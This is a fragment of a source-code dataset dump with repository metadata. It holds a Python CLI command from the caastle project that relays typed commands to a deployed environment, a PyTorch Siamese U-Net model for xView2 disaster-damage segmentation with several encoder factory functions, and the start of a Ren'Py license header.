] | 19 | 2017-09-01T03:42:00.000Z | 2018-01-25T09:53:59.000Z | client/fmcmds/env_shell.py | mrhm-dev/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 34 | 2017-08-30T14:11:16.000Z | 2017-12-16T01:52:44.000Z | client/fmcmds/env_shell.py | AlexRogalskiy/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 4 | 2019-01-20T22:04:59.000Z | 2022-01-09T02:25:35.000Z | import ast
import json
import readline
from cliff.command import Command
import call_server as server
class EnvironmentShell(Command):
def get_parser(self, prog_name):
parser = super(EnvironmentShell, self).get_parser(prog_name)
parser.add_argument(dest='env_name',
help="Environment name")
return parser
def take_action(self, parsed_args):
env_name = parsed_args.env_name
response = server.TakeAction().get_environment(env_name)
if response:
response_json = json.loads(response)
env_output_config = ast.literal_eval(response_json['data']['env_definition'])
type = env_output_config['environment']['app_deployment']['type']
if type == 'local-docker':
print("Shell functionality not available for local deployment target.")
print("You can use docker commands from command-line instead.")
exit()
if response_json['data']['status'] == 'available':
while True:
command_string = raw_input('("exit" to quit, "help" to see commands) cld>')
command_string = command_string.strip()
if command_string == 'exit':
break
print("Running the command %s in the environment..." % command_string)
response = server.TakeAction().run_command(env_name, command_string)
print(response)
else:
print("Environment %s is not in appropriate state." % env_name)
| 37.744186 | 95 | 0.59581 | import ast
import json
import readline
from cliff.command import Command
import call_server as server
class EnvironmentShell(Command):
def get_parser(self, prog_name):
parser = super(EnvironmentShell, self).get_parser(prog_name)
parser.add_argument(dest='env_name',
help="Environment name")
return parser
def take_action(self, parsed_args):
env_name = parsed_args.env_name
response = server.TakeAction().get_environment(env_name)
if response:
response_json = json.loads(response)
env_output_config = ast.literal_eval(response_json['data']['env_definition'])
type = env_output_config['environment']['app_deployment']['type']
if type == 'local-docker':
print("Shell functionality not available for local deployment target.")
print("You can use docker commands from command-line instead.")
exit()
if response_json['data']['status'] == 'available':
while True:
command_string = raw_input('("exit" to quit, "help" to see commands) cld>')
command_string = command_string.strip()
if command_string == 'exit':
break
print("Running the command %s in the environment..." % command_string)
response = server.TakeAction().run_command(env_name, command_string)
print(response)
else:
print("Environment %s is not in appropriate state." % env_name)
| true | true |
f72ecb13aa6024c6caa779e5cb7893e409d32f30 | 10,988 | py | Python | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | from functools import partial
from typing import List, Union, Callable
import torch
from pytorch_toolbelt.modules import ABN, ACT_RELU, ACT_SWISH
from pytorch_toolbelt.modules import encoders as E
from pytorch_toolbelt.modules.decoders import DecoderModule
from pytorch_toolbelt.modules.encoders import EncoderModule
from torch import nn
from torch.nn import functional as F
from .common import disaster_type_classifier, damage_types_classifier
from ..dataset import OUTPUT_MASK_KEY, DISASTER_TYPE_KEY, DISASTER_TYPES, DAMAGE_TYPE_KEY, DAMAGE_TYPES
__all__ = ["UnetV2SegmentationModel"]
class ConvBottleneck(nn.Module):
    """Fuse a decoder feature map with an encoder skip connection.

    The two tensors are concatenated along the channel axis and projected
    to ``out_channels`` by a 3x3 convolution followed by an in-place ReLU.
    ``in_channels`` must equal the sum of the two inputs' channel counts.
    """

    def __init__(self, in_channels, out_channels):
        super().__init__()
        # Submodule is named ``seq`` to keep state_dict keys stable.
        self.seq = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, 3, padding=1),
            nn.ReLU(inplace=True),
        )

    def forward(self, dec, enc):
        fused = torch.cat([dec, enc], dim=1)
        return self.seq(fused)
class UnetDecoderBlock(nn.Module):
    """Upsample a feature map 2x, then apply a 3x3 conv + in-place ReLU.

    ``middle_channels`` is accepted for signature compatibility with the
    call sites but is not used by this implementation.
    """

    def __init__(self, in_channels, middle_channels, out_channels):
        super().__init__()
        # Submodule is named ``layer`` to keep state_dict keys stable.
        self.layer = nn.Sequential(
            nn.Upsample(scale_factor=2),
            nn.Conv2d(in_channels, out_channels, 3, padding=1),
            nn.ReLU(inplace=True),
        )

    def forward(self, x):
        return self.layer(x)
class UNetDecoderV2(DecoderModule):
    """U-Net style decoder: upsample deepest features stage by stage,
    fusing each stage with the corresponding encoder feature map via a
    ``ConvBottleneck``, then do one final 2x upsample and a 1x1 projection
    to ``mask_channels``.

    Parameters
    ----------
    feature_maps
        Channel counts of the encoder feature maps, shallowest first.
    decoder_features
        Channel counts for the decoder stages. If a single int is passed,
        it is expanded to ``[f, 2f, 4f, ...]`` (one entry per encoder map).
    mask_channels
        Number of output channels of the final 1x1 convolution.
    last_upsample_filters
        Channels of the final upsample block; defaults to
        ``decoder_features[0]``.
    dropout, abn_block
        Accepted for API compatibility but NOT used by this implementation
        (no dropout or ABN layers are created here).
    """

    def __init__(
        self,
        feature_maps: List[int],
        decoder_features: List[int],
        mask_channels: int,
        last_upsample_filters=None,
        dropout=0.0,
        abn_block=ABN,
    ):
        super().__init__()
        # Allow a scalar; expand to a doubling progression per encoder stage.
        if not isinstance(decoder_features, list):
            decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]
        if last_upsample_filters is None:
            last_upsample_filters = decoder_features[0]

        self.encoder_features = feature_maps
        self.decoder_features = decoder_features

        # One upsampling stage per decoder feature count.
        self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])

        # Bottlenecks are built deepest-first (reversed decoder features):
        # the i-th bottleneck fuses decoder output of f channels with the
        # encoder map at index -i-2 (the next-shallower skip connection).
        self.bottlenecks = nn.ModuleList(
            [
                ConvBottleneck(self.encoder_features[-i - 2] + f, f)
                for i, f in enumerate(reversed(self.decoder_features[:]))
            ]
        )

        self.output_filters = decoder_features

        # Final 2x upsample back to (half of) input resolution, then 1x1
        # projection to the requested number of mask channels.
        self.last_upsample = UnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)
        self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)

    def get_decoder(self, layer):
        """Build decoder stage ``layer``.

        The deepest stage reads directly from the last encoder map; every
        other stage reads from the next-deeper decoder stage. Note that
        ``max(layer, 0)`` is always ``layer`` here since ``layer`` comes
        from ``range(...)``.
        """
        in_channels = (
            self.encoder_features[layer + 1]
            if layer + 1 == len(self.decoder_features)
            else self.decoder_features[layer + 1]
        )
        return UnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])

    def forward(self, feature_maps):
        """Decode ``feature_maps`` (shallowest first) into a mask tensor."""
        last_dec_out = feature_maps[-1]

        x = last_dec_out
        # Walk decoder stages deepest-first; ``rev_idx`` indexes from the
        # end of ``decoder_stages``/``feature_maps``. Each step upsamples
        # and then fuses with the next-shallower encoder feature map.
        for idx, bottleneck in enumerate(self.bottlenecks):
            rev_idx = -(idx + 1)
            decoder = self.decoder_stages[rev_idx]
            x = decoder(x)
            x = bottleneck(x, feature_maps[rev_idx - 1])

        x = self.last_upsample(x)

        f = self.final(x)
        return f
class UnetV2SegmentationModel(nn.Module):
    """Siamese two-branch U-Net for pre/post disaster imagery.

    The input tensor carries 6 channels: a pre-disaster RGB image in
    channels 0-2 and a post-disaster RGB image in channels 3-5. Both
    images are run through the SAME (weight-shared) encoder; per-stage
    features of the two branches are concatenated channel-wise and decoded
    into a segmentation mask. Optional heads classify disaster type and
    damage types from the deepest fused feature map.

    Output is a dict with key ``OUTPUT_MASK_KEY`` and, when the respective
    heads exist, ``DISASTER_TYPE_KEY`` and ``DAMAGE_TYPE_KEY``.
    """

    def __init__(
        self,
        encoder: EncoderModule,
        num_classes: int,
        disaster_type_classes: int,
        damage_type_classes: int,
        unet_channels: List[int],
        dropout=0.25,
        abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,
        full_size_mask=True,
    ):
        super().__init__()
        self.encoder = encoder

        # Each decoder stage sees pre- and post-image features concatenated,
        # so the per-stage channel count is doubled.
        feature_maps = [2 * fm for fm in encoder.output_filters]

        self.decoder = UNetDecoderV2(
            feature_maps=feature_maps,
            decoder_features=unet_channels,
            mask_channels=num_classes,
            dropout=dropout,
            abn_block=abn_block,
        )

        # If True, the predicted mask is bilinearly resized to the input size.
        self.full_size_mask = full_size_mask

        # Optional classifier heads; pass None to disable either one.
        if disaster_type_classes is not None:
            self.disaster_type_classifier = disaster_type_classifier(
                feature_maps[-1], disaster_type_classes, dropout=dropout
            )
        else:
            self.disaster_type_classifier = None

        if damage_type_classes is not None:
            self.damage_types_classifier = damage_types_classifier(
                feature_maps[-1], damage_type_classes, dropout=dropout
            )
        else:
            self.damage_types_classifier = None

    def forward(self, x):
        batch_size = x.size(0)
        # Split the 6-channel input into pre- and post-disaster RGB images.
        pre, post = x[:, 0:3, ...], x[:, 3:6, ...]

        if self.training:
            # Training: stack pre/post along the batch axis so the encoder
            # runs once on a 2B batch (keeps BatchNorm statistics joint),
            # then split each feature map back and concat channel-wise.
            x = torch.cat([pre, post], dim=0)
            features = self.encoder(x)
            features = [torch.cat([f[0:batch_size], f[batch_size : batch_size * 2]], dim=1) for f in features]
        else:
            # Inference: two separate encoder passes, then channel-concat.
            pre_features, post_features = self.encoder(pre), self.encoder(post)
            features = [torch.cat([pre, post], dim=1) for pre, post in zip(pre_features, post_features)]

        # Decode mask
        mask = self.decoder(features)

        if self.full_size_mask:
            # Resize mask to the spatial size of the input.
            mask = F.interpolate(mask, size=x.size()[2:], mode="bilinear", align_corners=False)

        output = {OUTPUT_MASK_KEY: mask}

        # Auxiliary heads consume the deepest fused feature map.
        if self.disaster_type_classifier is not None:
            disaster_type = self.disaster_type_classifier(features[-1])
            output[DISASTER_TYPE_KEY] = disaster_type

        if self.damage_types_classifier is not None:
            damage_types = self.damage_types_classifier(features[-1])
            output[DAMAGE_TYPE_KEY] = damage_types

        return output
def efficientb3_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a :class:`UnetV2SegmentationModel` with an EfficientNet-B3 encoder.

    ``input_channels`` is accepted for factory-signature compatibility; the
    model always consumes 6-channel (pre + post) input.
    """
    encoder = E.EfficientNetB3Encoder(
        pretrained=pretrained,
        layers=[0, 1, 2, 4, 6],
        abn_params={"activation": ACT_RELU},
    )
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def densenet121_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a :class:`UnetV2SegmentationModel` with a DenseNet-121 encoder.

    ``input_channels`` is accepted for factory-signature compatibility; the
    model always consumes 6-channel (pre + post) input.
    """
    encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def densenet169_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a :class:`UnetV2SegmentationModel` with a DenseNet-169 encoder.

    ``input_channels`` is accepted for factory-signature compatibility; the
    model always consumes 6-channel (pre + post) input.
    """
    encoder = E.DenseNet169Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[128, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet18_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a :class:`UnetV2SegmentationModel` with a ResNet-18 encoder.

    ``input_channels`` is accepted for factory-signature compatibility; the
    model always consumes 6-channel (pre + post) input.
    """
    encoder = E.Resnet18Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet34_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a :class:`UnetV2SegmentationModel` with a ResNet-34 encoder.

    ``input_channels`` is accepted for factory-signature compatibility; the
    model always consumes 6-channel (pre + post) input.
    """
    encoder = E.Resnet34Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a :class:`UnetV2SegmentationModel` with a ResNet-50 encoder.

    ``input_channels`` is accepted for factory-signature compatibility; the
    model always consumes 6-channel (pre + post) input.
    """
    encoder = E.Resnet50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[96, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a :class:`UnetV2SegmentationModel` with a ResNet-101 encoder.

    ``input_channels`` is accepted for factory-signature compatibility; the
    model always consumes 6-channel (pre + post) input.
    """
    encoder = E.Resnet101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 384],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def seresnext50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a UnetV2 segmentation model on an SE-ResNeXt-50 encoder backbone."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    backbone = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        backbone,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def seresnext101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """Build a UnetV2 segmentation model on an SE-ResNeXt-101 encoder backbone."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    backbone = E.SEResNeXt101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    return UnetV2SegmentationModel(
        backbone,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[128, 128, 256, 384],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
| 38.554386 | 117 | 0.650983 | from functools import partial
from typing import List, Union, Callable
import torch
from pytorch_toolbelt.modules import ABN, ACT_RELU, ACT_SWISH
from pytorch_toolbelt.modules import encoders as E
from pytorch_toolbelt.modules.decoders import DecoderModule
from pytorch_toolbelt.modules.encoders import EncoderModule
from torch import nn
from torch.nn import functional as F
from .common import disaster_type_classifier, damage_types_classifier
from ..dataset import OUTPUT_MASK_KEY, DISASTER_TYPE_KEY, DISASTER_TYPES, DAMAGE_TYPE_KEY, DAMAGE_TYPES
__all__ = ["UnetV2SegmentationModel"]
class ConvBottleneck(nn.Module):
    """Fuse a decoder feature map with an encoder skip connection.

    The two inputs are concatenated on the channel axis and passed
    through a 3x3 convolution followed by a ReLU.
    """

    def __init__(self, in_channels, out_channels):
        super().__init__()
        # `in_channels` must equal decoder channels + skip channels.
        self.seq = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, 3, padding=1),
            nn.ReLU(inplace=True),
        )

    def forward(self, dec, enc):
        fused = torch.cat([dec, enc], dim=1)
        return self.seq(fused)
class UnetDecoderBlock(nn.Module):
    """2x nearest-neighbour upsample followed by conv3x3 + ReLU.

    NOTE(review): `middle_channels` is accepted but never used - TODO confirm intent.
    """

    def __init__(self, in_channels, middle_channels, out_channels):
        super().__init__()
        self.layer = nn.Sequential(
            nn.Upsample(scale_factor=2),
            nn.Conv2d(in_channels, out_channels, 3, padding=1),
            nn.ReLU(inplace=True),
        )

    def forward(self, x):
        return self.layer(x)
class UNetDecoderV2(DecoderModule):
    """U-Net style decoder that consumes encoder feature maps from deepest
    to shallowest, upsampling and fusing skip connections at each stage.

    NOTE(review): `dropout` and `abn_block` are accepted but not used in
    this visible code - TODO confirm they are intentionally ignored.
    """

    def __init__(
        self,
        feature_maps: List[int],
        decoder_features: List[int],
        mask_channels: int,
        last_upsample_filters=None,
        dropout=0.0,
        abn_block=ABN,
    ):
        super().__init__()
        # A scalar decoder_features is expanded to a doubling pyramid,
        # one entry per encoder feature map.
        if not isinstance(decoder_features, list):
            decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]
        if last_upsample_filters is None:
            last_upsample_filters = decoder_features[0]
        self.encoder_features = feature_maps
        self.decoder_features = decoder_features
        self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])
        # One bottleneck per decoder stage; each fuses the upsampled decoder
        # output (f channels) with the matching encoder skip connection.
        self.bottlenecks = nn.ModuleList(
            [
                ConvBottleneck(self.encoder_features[-i - 2] + f, f)
                for i, f in enumerate(reversed(self.decoder_features[:]))
            ]
        )
        self.output_filters = decoder_features
        self.last_upsample = UnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)
        # 1x1 projection to the requested number of mask channels.
        self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)

    def get_decoder(self, layer):
        """Build the decoder stage for index `layer`.

        The deepest stage reads directly from the last encoder feature map;
        all others read from the next-deeper decoder stage.
        """
        in_channels = (
            self.encoder_features[layer + 1]
            if layer + 1 == len(self.decoder_features)
            else self.decoder_features[layer + 1]
        )
        return UnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])

    def forward(self, feature_maps):
        # Start from the deepest encoder feature map and walk back up,
        # alternating upsample (decoder stage) and skip fusion (bottleneck).
        last_dec_out = feature_maps[-1]
        x = last_dec_out
        for idx, bottleneck in enumerate(self.bottlenecks):
            rev_idx = -(idx + 1)
            decoder = self.decoder_stages[rev_idx]
            x = decoder(x)
            x = bottleneck(x, feature_maps[rev_idx - 1])
        x = self.last_upsample(x)
        f = self.final(x)
        return f
class UnetV2SegmentationModel(nn.Module):
    """Siamese U-Net for pre/post disaster imagery.

    The 6-channel input is split into a pre-disaster and a post-disaster
    3-channel image; both are run through the shared encoder and their
    feature maps are concatenated channel-wise before decoding. Optional
    classifier heads predict disaster type and damage types from the
    deepest fused feature map.
    """

    def __init__(
        self,
        encoder: EncoderModule,
        num_classes: int,
        disaster_type_classes: int,
        damage_type_classes: int,
        unet_channels: List[int],
        dropout=0.25,
        abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,
        full_size_mask=True,
    ):
        super().__init__()
        self.encoder = encoder
        # Pre/post features are concatenated, doubling every channel count.
        feature_maps = [2 * fm for fm in encoder.output_filters]
        self.decoder = UNetDecoderV2(
            feature_maps=feature_maps,
            decoder_features=unet_channels,
            mask_channels=num_classes,
            dropout=dropout,
            abn_block=abn_block,
        )
        self.full_size_mask = full_size_mask
        # Classifier heads are optional; pass None to disable either one.
        if disaster_type_classes is not None:
            self.disaster_type_classifier = disaster_type_classifier(
                feature_maps[-1], disaster_type_classes, dropout=dropout
            )
        else:
            self.disaster_type_classifier = None
        if damage_type_classes is not None:
            self.damage_types_classifier = damage_types_classifier(
                feature_maps[-1], damage_type_classes, dropout=dropout
            )
        else:
            self.damage_types_classifier = None

    def forward(self, x):
        batch_size = x.size(0)
        # Channels 0-2 are the pre-disaster image, 3-5 the post-disaster one.
        pre, post = x[:, 0:3, ...], x[:, 3:6, ...]
        if self.training:
            # One encoder pass over a doubled batch, then re-pair each
            # sample's pre/post features along the channel axis.
            x = torch.cat([pre, post], dim=0)
            features = self.encoder(x)
            features = [torch.cat([f[0:batch_size], f[batch_size : batch_size * 2]], dim=1) for f in features]
        else:
            # In eval mode run two separate encoder passes.
            pre_features, post_features = self.encoder(pre), self.encoder(post)
            features = [torch.cat([pre, post], dim=1) for pre, post in zip(pre_features, post_features)]
        mask = self.decoder(features)
        if self.full_size_mask:
            mask = F.interpolate(mask, size=x.size()[2:], mode="bilinear", align_corners=False)
        output = {OUTPUT_MASK_KEY: mask}
        if self.disaster_type_classifier is not None:
            disaster_type = self.disaster_type_classifier(features[-1])
            output[DISASTER_TYPE_KEY] = disaster_type
        if self.damage_types_classifier is not None:
            damage_types = self.damage_types_classifier(features[-1])
            output[DAMAGE_TYPE_KEY] = damage_types
        return output
def efficientb3_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on an EfficientNet-B3 encoder (stages 0, 1, 2, 4, 6)."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.EfficientNetB3Encoder(pretrained=pretrained,
                                      layers=[0, 1, 2, 4, 6],
                                      abn_params={"activation": ACT_RELU})
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def densenet121_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on a DenseNet-121 encoder."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def densenet169_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on a DenseNet-169 encoder."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.DenseNet169Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[128, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet18_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on a ResNet-18 encoder."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.Resnet18Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet34_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on a ResNet-34 encoder."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.Resnet34Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on a ResNet-50 encoder."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.Resnet50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[96, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on a ResNet-101 encoder."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.Resnet101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 384],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def seresnext50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on an SE-ResNeXt-50 encoder."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def seresnext101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2 segmentation model on an SE-ResNeXt-101 encoder."""
    # NOTE(review): `input_channels` is accepted but never used here - TODO confirm intent.
    encoder = E.SEResNeXt101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[128, 128, 256, 384],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
| true | true |
f72ecbbcaf235e8b00e8f6b45bc705145e916d73 | 107,466 | py | Python | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | # Copyright 2004-2019 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
